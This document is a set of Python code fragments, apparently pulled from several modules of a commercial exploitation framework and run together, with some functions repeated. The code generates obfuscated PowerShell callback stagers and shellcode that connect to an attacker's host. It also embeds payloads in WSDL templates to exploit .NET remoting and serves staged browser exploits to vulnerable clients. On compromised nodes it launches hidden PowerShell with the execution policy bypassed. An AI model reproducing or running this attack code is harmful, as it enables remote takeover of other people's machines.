def powershell_stager(self, port):
stager_template = None
ps_mosdef = mosdef_powershell(self)
powershell_string = ps_mosdef.createMosdefCallback().replace(
"\n", "\r\n")
with open(
os.path.join(os.path.dirname(__file__), "Resources",
"stager_template"), "rb") as handle:
stager_template = handle.read()
replacers = self.get_replacers(stager_template)
ignored_replacers = ["{psmosdef_byte_array}", "{ENTER}"]
for replacer in replacers:
if replacer not in ignored_replacers:
stager_template = stager_template.replace(
replacer, self.random_string(5))
elif replacer == "{psmosdef_byte_array}":
stager_template = stager_template.replace(
replacer,
",".join(["%d" % ord(x) for x in powershell_string]))
return stager_template
def generate_stager(self, port):
stager_template = None
ps_mosdef = mosdef_powershell(self)
powershell_string = ps_mosdef.createMosdefCallback().replace(
"\n", "\r\n")
# generateEncPSCommand results in a HUGE argument that gets cut off by
# our bug's process running code. Compression would be incompatible with older
# powershell versions.
with open(
os.path.join(os.path.dirname(__file__), "Resources",
"stager_template"), "rb") as handle:
stager_template = handle.read()
replacers = self.get_replacers(stager_template)
ignored_replacers = ["{psmosdef_byte_array}", "{ENTER}"]
for replacer in replacers:
if replacer not in ignored_replacers:
stager_template = stager_template.replace(
replacer, self.random_string(5))
elif replacer == "{psmosdef_byte_array}":
stager_template = stager_template.replace(
replacer,
",".join(["%d" % ord(x) for x in powershell_string]))
return stager_template
def generate_wsdl(self):
wsdl_template = None
ps_mosdef = mosdef_powershell(self)
powershell_string = ps_mosdef.createMosdefCallback()
b64_ps = base64.b64encode(powershell_string)
with open(os.path.join(os.path.dirname(__file__), "Resources", "wsdl_template"), "rb") as handle:
wsdl_template = handle.read()
replacers = self.get_replacers(wsdl_template)
# need one of these two to trigger RemotingClientProxy
# generation
object_types = ["MarshalByRefObject", "ServicedComponent"]
serialize_types = ["class", "struct"]
ignored_replacers = ["{powershell_mosdef}",
"{object_type}",
"{serialize_type}"]
for replacer in replacers:
if replacer not in ignored_replacers:
wsdl_template = wsdl_template.replace(replacer, self.random_string(5))
elif replacer == "{powershell_mosdef}":
wsdl_template = wsdl_template.replace("{powershell_mosdef}", b64_ps)
elif replacer == "{object_type}":
wsdl_template = wsdl_template.replace("{object_type}",
random.choice(object_types))
elif replacer == "{serialize_type}":
wsdl_template = wsdl_template.replace("{serialize_type}", random.choice(serialize_types))
return wsdl_template
def powershell_stager(self):
stager_template = None
ps_mosdef = mosdef_powershell(self)
p = payloads64.payloads(module=self)
asm = p.callback(self.callback.ip, self.callback.port, universal=True)
powershell_string = p.assemble(asm)
with open(
os.path.join(os.path.dirname(__file__), "Resources",
"stager_template"), "rb") as handle:
stager_template = handle.read()
replacers = self.get_replacers(stager_template)
ignored_replacers = ["{psmosdef_byte_array}", "{ENTER}"]
for replacer in replacers:
if replacer not in ignored_replacers:
stager_template = stager_template.replace(
replacer, self.random_string(5))
elif replacer == "{psmosdef_byte_array}":
stager_template = stager_template.replace(
replacer,
",".join(["%d" % ord(x) for x in powershell_string]))
return stager_template
def generate_powershell_command(self):
if self.HTTPMOSDEF:
# Because the powershell node doesn't support HTTP.
# Use a win32Node for this cases
self.ps_command = self.generate_ps_command_with_shellcode()
else:
ps_mosdef = mosdef_powershell(self)
ps_mosdef.createMosdefCallback()
self.ps_command = ps_mosdef.generatePSCommand(b64encode=True,
encoding="ASCII",
compression=False)
return self.ps_command
def makesploit(self, clientheader, clientbody):
h = header('SERVER')
b = body()
self.psmosdef = mosdef_powershell(self)
self.pscallback = self.psmosdef.createMosdefCallback()
if self.plugin_info:
logging.info(
"We got a plugin info for this target - thanks clientd!")
info_dict = self.plugin_info
user_agent = info_dict['user_agent']
if self.is_vulnerable(info_dict):
logging.info("This client is most likely vulnerable")
else:
logging.error(
"Bailing on this client as it is not likely to be vulnerable"
)
return None, None
else:
logging.info("Assuming vulnerable - no plugin info found!")
user_agent = clientheader.getStrValue(['User-Agent'])
if self.isWin7(user_agent):
logging.info("This client is most likely vulnerable")
self.win7 = True
if clientheader.URL.count(self.filename):
logging.info('Serving Stage 1 HTML file')
html = self.generate_html()
b.setBody(html)
h.addHeader('Content-Type', 'text/html')
elif clientheader.URL.count(self.pscallback_filename):
logging.info('Serving Stage 2 PowerShell Callback Script')
pscallback = self.pscallback
b.setBody(pscallback)
else:
logging.info('Respond with template')
html = self.generate_template()
b.setBody(html)
h.addHeader('Content-Type', 'text/html')
return h, b
def run(self):
self.getargs()
self.setInfo("%s (in progress)" % (NAME))
ret = False
#checking node
if not self.checkNode():
logging.error(
"Node (%s) not supported - You must run this module on a PowerShell node"
% self.ntype)
self.setInfo("%s - done (failed)" % NAME)
return False
#checking admin rights
logging.info("Checking admin rights")
if not self.checkAdminRights():
logging.error("User needs admin rights to create WMI events")
self.setInfo("%s - done (failed)" % NAME)
return False
logging.info("OK! - User has admin rights")
#create the callback
if self.pscb:
ps_mosdef = mosdef_powershell()
logging.info("Building Powershell callback")
ps_callback = ""
try:
ps_mosdef.setup(self.callback_host,
self.callback_port,
mosdef_id=self.engine.getNewMosdefID(self))
ps_callback = ps_mosdef.createMosdefCallback()
except Exception, err:
import traceback
traceback.print_exc()
logging.error("Error while building PowerShell callback (%s)" %
(err))
self.setInfo("%s - failed" % (NAME))
return 0
logging.info(
"Powershell callback was created for callback host %s:%s" %
(self.callback_host, str(self.callback_port)))
self.payload = ps_callback
def mosdef_stager(self):
logging.info(self.callback.ip)
logging.info(self.callback.port)
p = payloads64(module=self)
asm = p.InjectToSelf(self.callback.ip, self.callback.port)
shellcode = p.assemble(asm)
psmosdef = mosdef_powershell(self)
# 'hack' to use mosdef_powershell objects
# is necessary set psmosdef.callback_script with the powershell payload
payload = ''
payload = str(self.pspayload(shellcode))
psmosdef.callback_script = payload
script_mosdef = psmosdef.generateEncPSCommand()
evil_object = self.get_object(script_mosdef)
return base64.b64encode(evil_object)
def run(self):
self.getargs()
self.setInfo("%s (in progress)" % (NAME))
t_os = canvasos(self.OS)
# Create the object mosdef_powershell
ps_mosdef = mosdef_powershell()
logging.info("Building Powershell MOSDEF Callback Script")
try:
ps_mosdef.setup(self.callback_host,
self.callback_port,
mosdef_type=23,
mosdef_id=self.engine.getNewMosdefID(self))
self.psmosdefcallback = ps_mosdef.createMosdefCallback()
except Exception, err:
import traceback
traceback.print_exc()
logging.error("Error while building PowerShell callback (%s)" %
(err))
self.setInfo("%s - failed" % (NAME))
return 0
def getPSShellcode(self):
ps_mosdef = mosdef_powershell(self)
return ps_mosdef.createMosdefCallback()
def run(self):
self.setInfo("%s (in progress)" % (NAME))
self.init_listener()
self.result = []
for node in self.argsDict["passednodes"]:
nodetype = node.nodetype
if nodetype.upper() in ["WIN32NODE",
"WIN64NODE"]: # What about JavaNode?
try:
# Create mosdef powershell callback
self.ps_mosdef = mosdef_powershell(self)
self.ps_mosdef.createMosdefCallback()
source = self.ps_mosdef.getMosdefCallbackStream(
base64encode=True)
# upload callback script in base64
filename = "".join(
[random.choice(string.uppercase) for x in range(10)])
fullpath = "{}{}.ps1".format(node.shell.GetTempPathA(),
filename)
ret = node.shell.upload(source,
".\\",
fullpath,
sourceisbuffer=True)
if not ret:
logging.info(
"Failed to upload a powershell callback for node %s"
% node.get_name())
self.result += [0]
break
# Create powershell command
ps_command = self.ps_mosdef.generatePSCommand(
b64encode=True,
encoding="ASCII",
compression=False,
externalSource=fullpath)
# We add start /MIN to avoid showing the console
fn = 'cmd /c start /MIN powershell.exe -WindowStyle hidden -ex bypass -c %s' % ps_command
fn = fn.encode('ascii')
logging.info("Send commands: %s" % fn)
r = node.spawn(fn)
logging.info("Running powershell callback")
#r = node.runcommand(fn)
# can't call self.ISucceeded here, as we're stuck! (This will fail to bounce!
succeeded = self.ISucceeded()
#logging.info("Run command returned: %s" % r)
self.result.append(1)
except Exception, err:
logging.info(
"Failed to build and upload a powershell callback for node %s"
% node.get_name())
logging.error(
"Error while building powershell callback: %s" % (err))
#self.log_error("Error while building powershell callback: %s" % (err))
self.result += [0]
break
else:
logging.error(
"The node named %s of type %s does not have the capabilities needed to run this command"
% (node.get_name(), nodetype))
self.result += [0]